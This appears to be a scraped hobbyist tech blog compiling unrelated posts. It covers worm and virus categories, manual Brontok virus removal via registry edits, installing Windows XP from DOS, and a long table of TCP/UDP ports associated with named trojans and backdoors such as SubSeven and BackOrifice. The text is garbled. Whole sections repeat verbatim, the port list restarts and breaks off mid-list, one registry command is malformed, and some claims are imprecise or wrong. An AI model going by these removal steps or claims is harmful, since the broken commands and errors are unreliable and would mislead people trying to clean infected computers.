A worm usually exploits some sort of security hole or some bug in the software or the OS. Some famous worms are Mydoom ,So big( both spreading via email) and Code Red(effecting via whitehouse.gov) .
Unlike a virus, it does not need to attach itself to an existing program. Worms always harm the network (if only by consuming bandwidth), whereas viruses always infect or corrupt files on a targeted computer.Worms can expand from a single copy incredibly quickly .
A worm usually exploits some sort of security hole or some bug in the software or the OS. Some famous worms are Mydoom ,So big( both spreading via email) and Code Red(effecting via whitehouse.gov) .
Types of Viruses!!
Virus are classifed mainly on based on what they affect & how, size.
Based on what they effect.
Computer virus.
Mobile virus -Nowerdays many virus are written for mobile They spread through gprs/bluetooth.
Music player virus -There exsists only a handful of such virus.Theu spread when you add a song /video or dwnload some thing
Based on size
Tiny virii - These are under 500 bytes. They are designed to be undetectable due to their small size. TINY is one such virus. They generally very simple because their code length is so limited.
Large Virus- They are over 1,500 bytes. They are designed to be undetectable because they cover their tracks very well (all that code DOES have a use!). The best example of this is the Whale virus, which is perhaps the best 'stealth' virus in existence.
Other virus- These virus are easily detectable. Many virus are of this type.
Based on How they effect
All these many seam like compurt virus only but that is only partly true as your mobile too has an OS.
Boot Sector Virus: This virus replaces or implants itself in the boot sector---an area of the hard drive (or any other disk) accessed when you first turn on your computer. This kind of virus can prevent you from being able to boot your hard disk.
File Virus: This infects your applications. These then spread the virus by infecting other applications. You need to run or open these files.
Macro Virus: These account for about 75 percent of viruses found in the wild. They are written using a simplified macro programming language, these viruses affect Microsoft Office applications, such as Word and Excel, and . A document infected with a macro virus generally modifies a pre-existing, commonly used command (such as Save) to trigger its payload upon execution of that command.
Multipartite Virus: These infects both files and the boot sectorthat infect your system dozens of times before it's caught.
Polymorphic Virus: A well written virus of this type is usually difficult for antivirus scanners to detect but these are usually not that well written. They changes code whenever it passes to another machine.
Stealth Virus: These hides its presence by making an infected file not appear infected, but doesn't usually stand up to antivirus software
Based on what they effect.
Computer virus.
Mobile virus -Nowerdays many virus are written for mobile They spread through gprs/bluetooth.
Music player virus -There exsists only a handful of such virus.Theu spread when you add a song /video or dwnload some thing
Based on size
Tiny virii - These are under 500 bytes. They are designed to be undetectable due to their small size. TINY is one such virus. They generally very simple because their code length is so limited.
Large Virus- They are over 1,500 bytes. They are designed to be undetectable because they cover their tracks very well (all that code DOES have a use!). The best example of this is the Whale virus, which is perhaps the best 'stealth' virus in existence.
Other virus- These virus are easily detectable. Many virus are of this type.
Based on How they effect
All these many seam like compurt virus only but that is only partly true as your mobile too has an OS.
Boot Sector Virus: This virus replaces or implants itself in the boot sector---an area of the hard drive (or any other disk) accessed when you first turn on your computer. This kind of virus can prevent you from being able to boot your hard disk.
File Virus: This infects your applications. These then spread the virus by infecting other applications. You need to run or open these files.
Macro Virus: These account for about 75 percent of viruses found in the wild. They are written using a simplified macro programming language, these viruses affect Microsoft Office applications, such as Word and Excel, and . A document infected with a macro virus generally modifies a pre-existing, commonly used command (such as Save) to trigger its payload upon execution of that command.
Multipartite Virus: These infects both files and the boot sectorthat infect your system dozens of times before it's caught.
Polymorphic Virus: A well written virus of this type is usually difficult for antivirus scanners to detect but these are usually not that well written. They changes code whenever it passes to another machine.
Stealth Virus: These hides its presence by making an infected file not appear infected, but doesn't usually stand up to antivirus software
Remove Brontok Virus Urself
Start ur computer in safe mode with command prompt and type the followinf command to enable registry editor:-
reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
and run HKLM\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
after this ur registry editor is enable
type explorer
go to run and type regedit
then follow the following path :-
HKLM\Software\Microsoft\Windows\Currentversion\Run
on the right side delete the entries which contain 'Brontok' and 'Tok-' words.
after that restart ur system
open registry editor and follow the path to enable folder option in tools menu
HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ 'NoFolderOption'
delete this entry and restart ur computer
and search *.exe files in all drives (search in hidden files also)
remove all files which are display likes as folder icon.
ur computer is completely free from virus brontok...
reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
and run HKLM\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
after this ur registry editor is enable
type explorer
go to run and type regedit
then follow the following path :-
HKLM\Software\Microsoft\Windows\Currentversion\Run
on the right side delete the entries which contain 'Brontok' and 'Tok-' words.
after that restart ur system
open registry editor and follow the path to enable folder option in tools menu
HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ 'NoFolderOption'
delete this entry and restart ur computer
and search *.exe files in all drives (search in hidden files also)
remove all files which are display likes as folder icon.
ur computer is completely free from virus brontok...
Install Xp From Dos!!!!!
If XP is not installing from the CD or if you have a new drive with no operating system on
it yet try these:
Install Windows XP from the hard drive with Windows 98 already installed:
Boot Windows 98
Insert the XP CD into your CD reader
Explore Windows XP through My Computer
Copy i386 folder to C:\
Go into C:\i386 folder and double click on winnt32.exe to launch the setup from the hard drive
Install Windows XP from DOS (ie. no OS on a new hard drive):
Boot with a Windows 98 Start Up disk
Insert the Windows 98 CD into the CD reader
Run smartdrv.exe from the Win98 directory on the windows 98 CD (file caching)
Type cd.. to back up to the root directory
Insert Windows XP CD into the CD reader
Copy the i386 folder to C:\
Go into C:\i386 folder on C: and type winnt.exe to launch the setup from the hard drive.
it yet try these:
Install Windows XP from the hard drive with Windows 98 already installed:
Boot Windows 98
Insert the XP CD into your CD reader
Explore Windows XP through My Computer
Copy i386 folder to C:\
Go into C:\i386 folder and double click on winnt32.exe to launch the setup from the hard drive
Install Windows XP from DOS (ie. no OS on a new hard drive):
Boot with a Windows 98 Start Up disk
Insert the Windows 98 CD into the CD reader
Run smartdrv.exe from the Win98 directory on the windows 98 CD (file caching)
Type cd.. to back up to the root directory
Insert Windows XP CD into the CD reader
Copy the i386 folder to C:\
Go into C:\i386 folder on C: and type winnt.exe to launch the setup from the hard drive.
List of Trojan Ports!!!!!!!
TCP 1 Breach.2001, SocketsDeTroie.230, SocketsDeTroie.250
TCP 28 Amanda.200
TCP 31 MastersParadise.920
TCP 68 Subseven.100
TCP 142 NetTaxi.180
TCP 146 Infector.141, Intruder.100, Intruder.100
TCP 171 ATrojan.200
TCP 285 WCTrojan.100
TCP 286 WCTrojan.100
TCP 334 Backage.310
TCP 370 NeuroticKat.120, NeuroticKat.130
TCP 413 Coma.109
TCP 420 Breach.450
TCP 555 Id2001.100, PhaseZero.100, StealthSpy.100
TCP 623 Rtb666.160
TCP 660 Zaratustra.100
TCP 661 Noknok.800, Noknok.820
TCP 666 BackConstruction.210, BackConstruction.250, Bla.100, Bla.200, Bla.400, Bla.503, Cain.150, Dimbus.100, Noknok.820, Ripper.100, SatansBackdoor.100, SatansBackdoor.101, SatansBackdoor.102, Unicorn.100, Unicorn.101, Unicorn.110
TCP 667 SniperNet.210, Snipernet.220
TCP 668 Unicorn.101, Unicorn.110
TCP 680 Rtb666.160
TCP 777 Tiny.100, Undetected.230, Undetected.300, Undetected.310, Undetected.320, Undetected.330, Undetected.331, Undetected.332
TCP 785 NetworkTerrorist.100
TCP 800 NeuroticKitten.010
TCP 831 NeuroticKat.100, NeuroticKat.120, NeuroticKat.130
TCP 901 NetDevil.130, NetDevil.140
TCP 1000 DerSpaeher.200
TCP 1001 Silencer.100
TCP 1008 AutoSpy.100
TCP 1010 DerSpaeher.200
TCP 1015 Doly.150
TCP 1111 TPort.100
TCP 1130 Noknok.800, Noknok.820
TCP 1207 SoftWAR.100
TCP 1243 Subseven.100, SubSeven.110, SubSeven.180, SubSeven.190, Subseven.200
TCP 1245 VoodooDoll.006
TCP 1269 Matrix.130
TCP 1480 RemoteHack.130
TCP 1568 RemoteHack.100, RemoteHack.110
TCP 1600 DirectConnection.100
TCP 1601 DirectConnection.100
TCP 1602 DirectConnection.100
TCP 1634 NetCrack.100
TCP 1784 Snid.120, Snid.212
TCP 1999 TransmissionScout.100, TransmissionScout.110
TCP 2000 ATrojan.200, InsaneNetwork.400
TCP 2001 DIRT.220, TrojanCow.100
TCP 2003 TransmissionScout.100, TransmissionScout.110
TCP 2023 RipperPro.100
TCP 2040 InfernoUploader.100
TCP 2115 Bugs.100
TCP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
TCP 2332 SilentSpy.202
TCP 2589 Dagger.140
TCP 2600 DigitalRootbeer.100
TCP 2989 Rat.200
TCP 3128 MastersParadise.970
TCP 3129 MastersParadise.920, MastersParadise.970
TCP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
TCP 3215 BlackStar.100, Ghost.230
TCP 3333 Daodan.123
TCP 3410 OptixPro.100, OptixPro.110
TCP 3456 Force.155, TerrorTrojan.100
TCP 3505 AutoSpy.130, AutoSpy.140
TCP 3586 Snid.120, Snid.212
TCP 3700 PortalOfDoom.100
TCP 3723 Mantis.100
TCP 3800 Eclypse.100
TCP 3996 RemoteAnything.364
TCP 4000 SkyDance.220, SkyDance.229
TCP 4201 Wartrojan.160, Wartrojan.200
TCP 4225 SilentSpy.202
TCP 4321 Bobo.100
TCP 4444 AlexTrojan.200, Crackdown.100
TCP 4488 EventHorizon.100
TCP 4523 Celine.100
TCP 4545 InternalRevise.100, RemoteRevise.150
TCP 4567 FileNail.100
TCP 4666 Mneah.100
TCP 4950 ICQTrojan.100
TCP 5005 Aladino.060
TCP 5025 Keylogger.WMRemote.100
TCP 5031 NetMetro.104
TCP 5032 NetMetro.104
TCP 5033 NetMetro.104
TCP 5050 RoxRat.100
TCP 5151 OptixLite.020, OptixLite.030, OptixLite.040
TCP 5190 MBomber.100
TCP 5277 WinShell.400
TCP 5343 WCRat.100
TCP 5400 BackConstruction.120, BackConstruction.150, BladeRunner.080, DeepThroat.300
TCP 5401 BackConstruction.120, BackConstruction.150, BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5402 BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5534 TheFlu.100
TCP 5550 XTCP.200, XTCP.201
TCP 5555 Noxcape.100, Noxcape.200
TCP 5695 Assassin.100
TCP 5714 WinCrash.100
TCP 5741 WinCrash.100
TCP 5742 WinCrash.103
TCP 5802 Y3KRat.160
TCP 5810 Y3KRat.160
TCP 5838 Y3KRat.170
TCP 5858 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5880 Y3KRat.140
TCP 5881 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5883 Y3KRat.110, Y3KRat.140
TCP 5884 Y3KRat.140, Y3KRat.150
TCP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5886 Y3KRat.120, Y3KRat.140
TCP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5889 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5890 Y3KRat.140
TCP 6400 Thething.100, Thething.150
TCP 6556 AutoSpy.120, AutoSpy.122
TCP 6655 Aqua.020
TCP 6660 LameSpy.095
TCP 6666 LameRemote.100, ProjectMayhem.100
TCP 6669 Vampire.100
TCP 6670 DeepThroat.200, DeepThroat.210
TCP 6671 DeepThroat.310
TCP 6699 HostControl.101
TCP 6711 DeepThroat.300, Noknok.820, SubSeven.180, SubSeven.190
TCP 6712 Subseven.100
TCP 6713 Subseven.100
TCP 6767 NTRC.120
TCP 6776 SubSeven.180, SubSeven.190, Subseven.200
TCP 6789 Doly.200
TCP 6796 SubSeven.214
TCP 6912 ShitHeep.100
TCP 6939 Indoctrination.100
TCP 6953 Lithium.100
TCP 6969 2000Cracks.100, Bigorna.100, Danton.110, Danton.210, Danton.220, Danton.310, Danton.320, Danton.330, GateCrasher.110, NetController.108, Sparta.110, VagrNocker.120
TCP 6970 Danton.330
TCP 7001 Freak88.100
TCP 7119 Massaker.100
TCP 7200 Massaker.110
TCP 7300 Coced.221
TCP 7301 Coced.221
TCP 7306 NetSpy.200, NetSpy.200
TCP 7410 Phoenix.190, Phoenix.200
TCP 7511 Genue.100
TCP 7609 Snid.120, Snid.212
TCP 7614 Wollf.130
TCP 7648 BlackStar.100, Ghost.230
TCP 7788 Last.2000, Matrix.200
TCP 7826 MiniOblivion.010, Oblivion.010
TCP 7887 SmallFun.110
TCP 7891 Revenger.100
TCP 7979 VagrNocker.200
TCP 7997 VagrNocker.200
TCP 8000 XConsole.100
TCP 8011 Way.240
TCP 8012 Ptakks.215, Ptakks.217
TCP 8110 LoseLove.100
TCP 8111 LoseLove.100
TCP 8301 LoseLove.100
TCP 8302 LoseLove.100
TCP 8372 NetBoy.100
TCP 8720 Connection.130
TCP 8734 AutoSpy.110
TCP 8811 Force.155
TCP 8899 Last.2000
TCP 9000 Aristotles.100
TCP 9301 LoseLove.100
TCP 9400 InCommand.100, InCommand.110, InCommand.120, InCommand.130, InCommand.140, InCommand.150, InCommand.153, InCommand.160, InCommand.167, InCommand.170
TCP 9401 InCommand.100, InCommand.110, InCommand.170
TCP 9402 InCommand.100, InCommand.110
TCP 9561 CRatPro.110
TCP 9563 CRatPro.110
TCP 9580 TheefLE.100
TCP 9696 Danton.210, Ghost.230
TCP 9697 Danton.320, Danton.330, Ghost.230
TCP 9870 R3C.100
TCP 9872 PortalOfDoom.100
TCP 9873 PortalOfDoom.100
TCP 9874 PortalOfDoom.100
TCP 9875 PortalOfDoom.100
TCP 9876 Rux.100, SheepGoat.100
TCP 9877 SmallBigBrother.020
TCP 9878 SmallBigBrother.020, TransmissionScout.100, TransmissionScout.110, TransmissionScout.120
TCP 9879 SmallBigBrother.020
TCP 9999 ForcedEntry.100, Infra.100, Prayer.120, Prayer.130, TakeOver.200, TakeOver.300
TCP 10001 DTr.130, DTr.140
TCP 10013 Amanda.200
TCP 10067 PortalOfDoom.100
TCP 10100 Gift.240
TCP 10101 NewSilencer.100
TCP 10167 PortalOfDoom.100
TCP 10528 HostControl.100, HostControl.260
TCP 10607 Coma.109
TCP 10666 Ambush.100
TCP 11011 Amanda.200
TCP 11050 HostControl.101
TCP 11051 HostControl.100, HostControl.260
TCP 11223 AntiNuke.100, Progenic.100, Progenic.110
TCP 11225 Cyn.100, Cyn.103, Cyn.120
TCP 11306 Noknok.800, Noknok.820
TCP 11831 Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 11991 PitfallSurprise.100
TCP 12043 Frenzy.2000
TCP 12345 Fade.100, Netbus.160, Netbus.170, VagrNocker.400
TCP 12346 Netbus.160, Netbus.170
TCP 12348 Bionet.210, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.316, Bionet.317
TCP 12349 Bionet.084, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.314, Bionet.316, Bionet.317, Bionet.401, Bionet.402
TCP 12389 KheSanh.210
TCP 12478 Bionet.210
TCP 12623 Buttman.090, Buttman.100
TCP 12624 Buttman.090, Buttman.100
TCP 12625 Buttman.100
TCP 12904 Akropolis.100, Rocks.100
TCP 13473 Chupacabra.100
TCP 13753 AFTP.010
TCP 14100 Eurosol.100
TCP 14194 CyberSpy.840
TCP 14286 HellDriver.100
TCP 14500 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14501 PCInvader.060, PCInvader.070
TCP 14502 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14503 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14504 PCInvader.050, PCInvader.060
TCP 15092 HostControl.100, HostControl.260
TCP 15382 SubZero.100
TCP 15432 Cyn.210
TCP 15555 ICMIBC.100
TCP 16322 LastDoor.100
TCP 16484 MoSucker.110
TCP 16661 Dfch.010
TCP 16969 Progenic.100
TCP 16982 AcidShiver.100
TCP 17300 Kuang.200
TCP 17499 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17500 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17569 Infector.141, Infector.160, Infector.170, Infector.180, Infector.190, Infector.200, Intruder.100, Intruder.100
TCP 17593 AudioDoor.120
TCP 19191 BlueFire.035, BlueFire.041
TCP 19604 Metal.270
TCP 19605 Metal.270
TCP 19991 Dfch.010
TCP 20000 Millenium.100
TCP 20001 Millenium.100, PshychoFiles.180
TCP 20002 AcidKor.100, PshychoFiles.180
TCP 20005 MoSucker.200, MoSucker.210, MoSucker.220
TCP 21212 Schwindler.182
TCP 21554 Exploiter.100, Exploiter.110, Girlfriend.130, GirlFriend.135
TCP 21579 Breach.2001
TCP 21584 Breach.2001
TCP 21684 Intruse.134
TCP 22068 AcidShiver.110
TCP 22115 Cyn.120
TCP 22222 Prosiak.047, Ruler.141, Rux.300, Rux.400, Rux.500, Rux.600
TCP 22223 Rux.400, Rux.500, Rux.600
TCP 22456 Bla.200, Bla.503
TCP 22457 AcidShiver.120, Bla.200, Bla.503
TCP 22784 Intruzzo.110
TCP 22845 Breach.450
TCP 22847 Breach.450
TCP 23005 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23006 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23032 Amanda.200
TCP 23432 Asylum.010, Asylum.012, Asylum.013, Asylum.014, MiniAsylum.110
TCP 23456 EvilFTP.100, VagrNocker.400
TCP 23476 DonaldDick.153, DonaldDick.154, DonaldDick.155
TCP 23477 DonaldDick.153
TCP 24000 Infector.170
TCP 24307 Wildek.020
TCP 25386 MoonPie.220
TCP 25486 MoonPie.220
TCP 25555 FreddyK.100, FreddyK.200
TCP 25556 FreddyK.100
TCP 25685 MoonPie.010, MoonPie.012, MoonPie.130, MoonPie.220, MoonPie.240, MoonPie.400
TCP 25686 MoonPie.135, MoonPie.200, MoonPie.400
TCP 25982 MoonPie.135, MoonPie.200
TCP 26274 Delta.050
TCP 27160 MoonPie.135, MoonPie.200
TCP 27184 Alvgus.100, Alvgus.800
TCP 27374 Muerte.110, Subseven.210, SubSeven.213
TCP 28429 Hack'a'Tack.2000
TCP 28430 Hack'a'Tack.2000
TCP 28431 Hack'a'Tack.2000
TCP 28432 Hack'a'Tack.2000
TCP 28433 Hack'a'Tack.2000
TCP 28434 Hack'a'Tack.2000
TCP 28435 Hack'a'Tack.2000
TCP 28436 Hack'a'Tack.2000
TCP 29559 DuckToy.100, DuckToy.101, Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 29891 Unexplained.100
TCP 30000 Infector.170
TCP 30001 Error32.100
TCP 30003 LamersDeath.100
TCP 30029 AOLTrojan.110
TCP 30100 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30101 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30102 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30103 NetSphere.131
TCP 30947 Intruse.134
TCP 31320 LittleWitch.400, LittleWitch.420
TCP 31337 BackOrifice.120, Khaled.100, OPC.200
TCP 31415 Lithium.101
TCP 31416 Lithium.100, Lithium.101
TCP 31557 Xanadu.110
TCP 31631 CleptoManicos.100
TCP 31745 Buschtrommel.100, Buschtrommel.122
TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31887 BDDT.100
TCP 31889 BDDT.100
TCP 32100 ProjectNext.053
TCP 32418 AcidBattery.100
TCP 32791 Akropolis.100, Rocks.100
TCP 33291 RemoteHak.001
TCP 33333 Blackharaz.100, Prosiak.047, SubSeven.214
TCP 33577 SonOfPsychward.020
TCP 34324 TelnetServer.100
TCP 34763 Infector.180, Infector.190, Infector.200
TCP 35000 Infector.190, Infector.200
TCP 35600 Subsari.140
TCP 36794 BugBear.100
TCP 37237 Mantis.020
TCP 37651 YAT.210
TCP 37653 YAT.310
TCP 40308 Subsari.140
TCP 40412 TheSpy.100
TCP 40421 MastersParadise.970
TCP 40422 MastersParadise.970
TCP 40999 DiemsMutter.110, DiemsMutter.140
TCP 41626 Shah.100
TCP 44444 Prosiak.070
TCP 45673 Akropolis.100, Rocks.100
TCP 47262 Delta.050
TCP 48006 Fragglerock.200
TCP 49683 HolzPferd.210
TCP 50000 Infector.180
TCP 50130 Enterprise.100
TCP 50766 Fore.100
TCP 51234 Cyn.210
TCP 51966 Cafeini.080, Cafeini.110
TCP 54321 PCInvader.010
TCP 57341 NetRaider.100
TCP 57922 Bionet.084
TCP 58008 Tron.100
TCP 58009 Tron.100
TCP 59090 AcidReign.200
TCP 59211 DuckToy.100, DuckToy.101
TCP 59345 NewFuture.100
TCP 60000 DeepThroat.300, MiniBacklash.100, MiniBacklash.101, MiniBacklash.101
TCP 60411 Connection.100, Connection.130
TCP 60412 Connection.130
TCP 60552 RoxRat.100
TCP 63536 InsaneNetwork.500
TCP 63878 AphexFTP.100
TCP 63879 AphexFTP.100
TCP 64969 Lithium.100
TCP 65000 Socket.100
UDP 1 SocketsDeTroie.250
UDP 666 Bla.200, Bla.400, Bla.503, Noknok.820
UDP 1130 Noknok.800, Noknok.820
UDP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
UDP 2989 Rat.200
UDP 3128 MastersParadise.970
UDP 3129 MastersParadise.920, MastersParadise.970
UDP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
UDP 3333 Daodan.123
UDP 3800 Eclypse.100
UDP 3996 RemoteAnything.364
UDP 4000 RemoteAnything.364
UDP 5555 Daodan.123
UDP 5881 Y3KRat.110, Y3KRat.140
UDP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
UDP 5883 Y3KRat.110, Y3KRat.140
UDP 5884 Y3KRat.140, Y3KRat.150
UDP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5886 Y3KRat.120, Y3KRat.140
UDP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.150
UDP 6953 Lithium.100
UDP 8012 Ptakks.217
UDP 10067 PortalOfDoom.100
UDP 10167 PortalOfDoom.100
UDP 10666 Ambush.100
UDP 11225 Cyn.100, Cyn.103, Cyn.120
UDP 11306 Noknok.800, Noknok.820
UDP 12389 KheSanh.210
UDP 12623 Buttman.090, Buttman.100
UDP 12625 Buttman.100
UDP 14100 Eurosol.100
UDP 23476 DonaldDick.155
UDP 26274 Delta.050
UDP 27184 Alvgus.100
UDP 28431 Hack'a'Tack.2000
UDP 28432 Hack'a'Tack.2000
UDP 28433 Hack'a'Tack.2000
UDP 28434 Hack'a'Tack.2000
UDP 28435 Hack'a'Tack.2000
UDP 28436 Hack'a'Tack.2000
UDP 29891 Unexplained.100
UDP 30103 NetSphere.131
UDP 31320 LittleWitch.400, LittleWitch.420
UDP 31337 BackOrifice.120, OPC.200
UDP 31416 Lithium.100, Lithium.101
UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112
UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112
UDP 33333 Blackharaz.100
UDP 47262 Delta.050
UDP 49683 HolzPferd.210
UDP 60000 MiniBacklash.100
TCP 28 Amanda.200
TCP 31 MastersParadise.920
TCP 68 Subseven.100
TCP 142 NetTaxi.180
TCP 146 Infector.141, Intruder.100, Intruder.100
TCP 171 ATrojan.200
TCP 285 WCTrojan.100
TCP 286 WCTrojan.100
TCP 334 Backage.310
TCP 370 NeuroticKat.120, NeuroticKat.130
TCP 413 Coma.109
TCP 420 Breach.450
TCP 555 Id2001.100, PhaseZero.100, StealthSpy.100
TCP 623 Rtb666.160
TCP 660 Zaratustra.100
TCP 661 Noknok.800, Noknok.820
TCP 666 BackConstruction.210, BackConstruction.250, Bla.100, Bla.200, Bla.400, Bla.503, Cain.150, Dimbus.100, Noknok.820, Ripper.100, SatansBackdoor.100, SatansBackdoor.101, SatansBackdoor.102, Unicorn.100, Unicorn.101, Unicorn.110
TCP 667 SniperNet.210, Snipernet.220
TCP 668 Unicorn.101, Unicorn.110
TCP 680 Rtb666.160
TCP 777 Tiny.100, Undetected.230, Undetected.300, Undetected.310, Undetected.320, Undetected.330, Undetected.331, Undetected.332
TCP 785 NetworkTerrorist.100
TCP 800 NeuroticKitten.010
TCP 831 NeuroticKat.100, NeuroticKat.120, NeuroticKat.130
TCP 901 NetDevil.130, NetDevil.140
TCP 1000 DerSpaeher.200
TCP 1001 Silencer.100
TCP 1008 AutoSpy.100
TCP 1010 DerSpaeher.200
TCP 1015 Doly.150
TCP 1111 TPort.100
TCP 1130 Noknok.800, Noknok.820
TCP 1207 SoftWAR.100
TCP 1243 Subseven.100, SubSeven.110, SubSeven.180, SubSeven.190, Subseven.200
TCP 1245 VoodooDoll.006
TCP 1269 Matrix.130
TCP 1480 RemoteHack.130
TCP 1568 RemoteHack.100, RemoteHack.110
TCP 1600 DirectConnection.100
TCP 1601 DirectConnection.100
TCP 1602 DirectConnection.100
TCP 1634 NetCrack.100
TCP 1784 Snid.120, Snid.212
TCP 1999 TransmissionScout.100, TransmissionScout.110
TCP 2000 ATrojan.200, InsaneNetwork.400
TCP 2001 DIRT.220, TrojanCow.100
TCP 2003 TransmissionScout.100, TransmissionScout.110
TCP 2023 RipperPro.100
TCP 2040 InfernoUploader.100
TCP 2115 Bugs.100
TCP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
TCP 2332 SilentSpy.202
TCP 2589 Dagger.140
TCP 2600 DigitalRootbeer.100
TCP 2989 Rat.200
TCP 3128 MastersParadise.970
TCP 3129 MastersParadise.920, MastersParadise.970
TCP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
TCP 3215 BlackStar.100, Ghost.230
TCP 3333 Daodan.123
TCP 3410 OptixPro.100, OptixPro.110
TCP 3456 Force.155, TerrorTrojan.100
TCP 3505 AutoSpy.130, AutoSpy.140
TCP 3586 Snid.120, Snid.212
TCP 3700 PortalOfDoom.100
TCP 3723 Mantis.100
TCP 3800 Eclypse.100
TCP 3996 RemoteAnything.364
TCP 4000 SkyDance.220, SkyDance.229
TCP 4201 Wartrojan.160, Wartrojan.200
TCP 4225 SilentSpy.202
TCP 4321 Bobo.100
TCP 4444 AlexTrojan.200, Crackdown.100
TCP 4488 EventHorizon.100
TCP 4523 Celine.100
TCP 4545 InternalRevise.100, RemoteRevise.150
TCP 4567 FileNail.100
TCP 4666 Mneah.100
TCP 4950 ICQTrojan.100
TCP 5005 Aladino.060
TCP 5025 Keylogger.WMRemote.100
TCP 5031 NetMetro.104
TCP 5032 NetMetro.104
TCP 5033 NetMetro.104
TCP 5050 RoxRat.100
TCP 5151 OptixLite.020, OptixLite.030, OptixLite.040
TCP 5190 MBomber.100
TCP 5277 WinShell.400
TCP 5343 WCRat.100
TCP 5400 BackConstruction.120, BackConstruction.150, BladeRunner.080, DeepThroat.300
TCP 5401 BackConstruction.120, BackConstruction.150, BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5402 BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5534 TheFlu.100
TCP 5550 XTCP.200, XTCP.201
TCP 5555 Noxcape.100, Noxcape.200
TCP 5695 Assassin.100
TCP 5714 WinCrash.100
TCP 5741 WinCrash.100
TCP 5742 WinCrash.103
TCP 5802 Y3KRat.160
TCP 5810 Y3KRat.160
TCP 5838 Y3KRat.170
TCP 5858 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5880 Y3KRat.140
TCP 5881 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5883 Y3KRat.110, Y3KRat.140
TCP 5884 Y3KRat.140, Y3KRat.150
TCP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5886 Y3KRat.120, Y3KRat.140
TCP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5889 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5890 Y3KRat.140
TCP 6400 Thething.100, Thething.150
TCP 6556 AutoSpy.120, AutoSpy.122
TCP 6655 Aqua.020
TCP 6660 LameSpy.095
TCP 6666 LameRemote.100, ProjectMayhem.100
TCP 6669 Vampire.100
TCP 6670 DeepThroat.200, DeepThroat.210
TCP 6671 DeepThroat.310
TCP 6699 HostControl.101
TCP 6711 DeepThroat.300, Noknok.820, SubSeven.180, SubSeven.190
TCP 6712 Subseven.100
TCP 6713 Subseven.100
TCP 6767 NTRC.120
TCP 6776 SubSeven.180, SubSeven.190, Subseven.200
TCP 6789 Doly.200
TCP 6796 SubSeven.214
TCP 6912 ShitHeep.100
TCP 6939 Indoctrination.100
TCP 6953 Lithium.100
TCP 6969 2000Cracks.100, Bigorna.100, Danton.110, Danton.210, Danton.220, Danton.310, Danton.320, Danton.330, GateCrasher.110, NetController.108, Sparta.110, VagrNocker.120
TCP 6970 Danton.330
TCP 7001 Freak88.100
TCP 7119 Massaker.100
TCP 7200 Massaker.110
TCP 7300 Coced.221
TCP 7301 Coced.221
TCP 7306 NetSpy.200, NetSpy.200
TCP 7410 Phoenix.190, Phoenix.200
TCP 7511 Genue.100
TCP 7609 Snid.120, Snid.212
TCP 7614 Wollf.130
TCP 7648 BlackStar.100, Ghost.230
TCP 7788 Last.2000, Matrix.200
TCP 7826 MiniOblivion.010, Oblivion.010
TCP 7887 SmallFun.110
TCP 7891 Revenger.100
